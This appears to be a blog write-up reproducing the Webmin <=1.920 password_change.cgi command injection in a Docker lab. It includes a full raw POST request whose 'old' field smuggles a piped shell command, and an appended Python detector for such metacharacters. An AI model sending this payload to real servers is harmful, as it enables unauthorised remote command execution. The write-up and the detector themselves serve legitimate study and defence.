0x00 Foreword
I had wanted to reproduce this a while ago, but the version on the official website had already been updated. Only today did I find an environment on Docker, so it has now been reproduced.
0x01 Affected Versions
Webmin<=1.920
0x02 Building the environment
docker search webmin
docker pull piersonjarvis/webmin-samba
docker run -d -p 10000:80 piersonjarvis/webmin-samba
Browse to your-ip:10000 to reach Webmin version 1.920.
Log in to the admin console with the account and password root / Webmin.
Enable the password reset feature:
Webmin--Webmin Configuration--Authentication
0x03 Exploitation
After a long search I could not find the interface for changing the password, so I captured a request and manually constructed a packet as follows:
POST /password_change.cgi HTTP/1.1
Host: 136.244.xx.xx:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://136.244.xx.xx:10000/passwd/index.cgi?xnavigation=1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: passwd/edit_passwd.cgi?user=root
X-Requested-From: passwd
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: text/plain;charset=UTF-8
Content-Length: 49
DNT: 1
Connection: close

user=laemon&old=123123|id&new1=123456&new2=123456
In the end, the command executes successfully.
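A defender-side check for the request shown above, as an added example that is not part of the original post: it parses a raw HTTP request and reports shell metacharacters in the password_change.cgi form fields, including percent-encoded ones. The function names, the metacharacter set and the sample requests (host webmin.example) are assumptions constructed for illustration.

```python
from urllib.parse import parse_qsl

# Heuristic set (an assumption): characters that let a form value break out
# into a shell. A legitimate password containing one of them is also flagged,
# so treat a hit as an alert to review, not as proof of an attack.
SHELL_META = set("|;&`$<>\n\r")
FIELDS = ("user", "old", "new1", "new2")

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _version = head.split("\n")[0].split(" ", 2)
    return method, target.split("?", 1)[0], body

def inspect(raw):
    """Return [(field, offending_chars)] for POSTs to password_change.cgi."""
    method, path, body = parse_request(raw)
    if method != "POST" or not path.rstrip("/").endswith("/password_change.cgi"):
        return []
    findings = []
    # parse_qsl percent-decodes, so %7C is caught as well as a literal '|'.
    for name, value in parse_qsl(body, keep_blank_values=True):
        bad = sorted(SHELL_META.intersection(value))
        if name in FIELDS and bad:
            findings.append((name, "".join(bad)))
    return findings

# Constructed samples: the form body is the one from the post, the host is a placeholder.
HEAD = (
    "POST /password_change.cgi HTTP/1.1\r\n"
    "Host: webmin.example:10000\r\n"
    "Content-Type: text/plain;charset=UTF-8\r\n"
    "\r\n"
)
SAMPLE_FLAGGED = HEAD + "user=laemon&old=123123|id&new1=123456&new2=123456"
SAMPLE_CLEAN = HEAD + "user=laemon&old=123123&new1=123456&new2=123456"

if __name__ == "__main__":
    for label, req in (("flagged", SAMPLE_FLAGGED), ("clean", SAMPLE_CLEAN)):
        print(label, inspect(req))
```

The same function can be run over request bodies captured by a reverse proxy or IDS placed in front of Webmin, since ordinary access logs do not record POST bodies.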
Reference article:
https://paper.seebug.org/1019/